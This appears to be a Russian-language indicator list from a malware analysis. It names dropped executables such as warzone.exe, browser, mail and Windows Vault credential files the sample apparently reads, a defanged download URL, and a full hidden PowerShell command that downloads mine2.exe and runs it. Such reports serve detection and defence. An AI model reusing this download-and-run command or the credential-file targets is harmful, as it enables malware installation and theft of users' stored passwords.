Техническая информация
- http://91.#34.33.4/mine2.exe как %appdata%\wins.exe
- %WINDIR%\syswow64\cmd.exe
- fp.hzjika.exe
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
- %APPDATA%\mozilla\firefox\profiles.ini
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\wins.exe
- %ALLUSERSPROFILE%\warzone.exe
- %APPDATA%\fp.hzjika.exe
- %APPDATA%\eg.s.jj.tmp
- %APPDATA%\ji.ztph.tmp
- %APPDATA%\albx..i.tmp
- %APPDATA%\cfiesic.tmp
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %APPDATA%\eg.s.jj.tmp
- %APPDATA%\ji.ztph.tmp
- %APPDATA%\albx..i.tmp
- %APPDATA%\cfiesic.tmp
- http://91.#34.33.4/mine2.exe
- '%APPDATA%\wins.exe'
- '%ALLUSERSPROFILE%\warzone.exe'
- '%APPDATA%\fp.hzjika.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://91.#34.33.4/mine2.exe','%APPDATA%\wins.exe');Start-Process '%APPDATA%\...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe'